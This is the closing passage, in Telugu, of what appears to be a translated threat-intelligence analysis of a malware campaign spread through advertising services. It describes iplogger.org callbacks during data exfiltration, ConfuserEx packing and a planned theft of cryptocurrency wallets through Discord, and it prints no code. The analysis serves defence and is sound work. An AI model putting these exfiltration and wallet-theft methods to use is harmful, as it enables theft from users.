కార్యక్రమం అభివృద్ధిలో ఉందని మరొక సంకేతం ఉంది. బైనరీ ఫైల్లో రెండు iplogger.org URLలు ఉన్నాయి మరియు డేటా ఎక్స్ఫిల్ట్ చేయబడినప్పుడు రెండూ ప్రశ్నించబడతాయి. ఈ URLలలో ఒకదానికి చేసిన అభ్యర్థనలో, రెఫరర్ ఫీల్డ్లోని విలువకు ముందు “DEV /” ఉంటుంది. మేము ConfuserExని ఉపయోగించి ప్యాక్ చేయని సంస్కరణను కూడా కనుగొన్నాము, ఈ URL గ్రహీత పేరు DevFeedbackUrl. ఎన్విరాన్మెంట్ వేరియబుల్ పేరు ఆధారంగా, క్రిప్టోకరెన్సీ వాలెట్లను దొంగిలించడానికి ఆపరేటర్లు చట్టబద్ధమైన సర్వీస్ డిస్కార్డ్ మరియు దాని వెబ్ ఇంటర్సెప్షన్ సిస్టమ్ను ఉపయోగించాలని ప్లాన్ చేస్తున్నారని మేము విశ్వసిస్తున్నాము.
తీర్మానం
సైబర్ దాడులలో చట్టబద్ధమైన ప్రకటనల సేవల వినియోగానికి ఈ ప్రచారం ఒక ఉదాహరణ. ఈ పథకం రష్యన్ సంస్థలను లక్ష్యంగా చేసుకుంటుంది, అయితే రష్యాయేతర సేవలను ఉపయోగించి అటువంటి దాడిని చూసి మేము ఆశ్చర్యపోము. రాజీని నివారించడానికి, వినియోగదారులు తాము డౌన్లోడ్ చేసే సాఫ్ట్వేర్ యొక్క మూలం యొక్క కీర్తిపై నమ్మకంగా ఉండాలి.
రాజీ మరియు MITER ATT&CK లక్షణాల యొక్క పూర్తి జాబితా ఇక్కడ అందుబాటులో ఉంది
మూలం: www.habr.com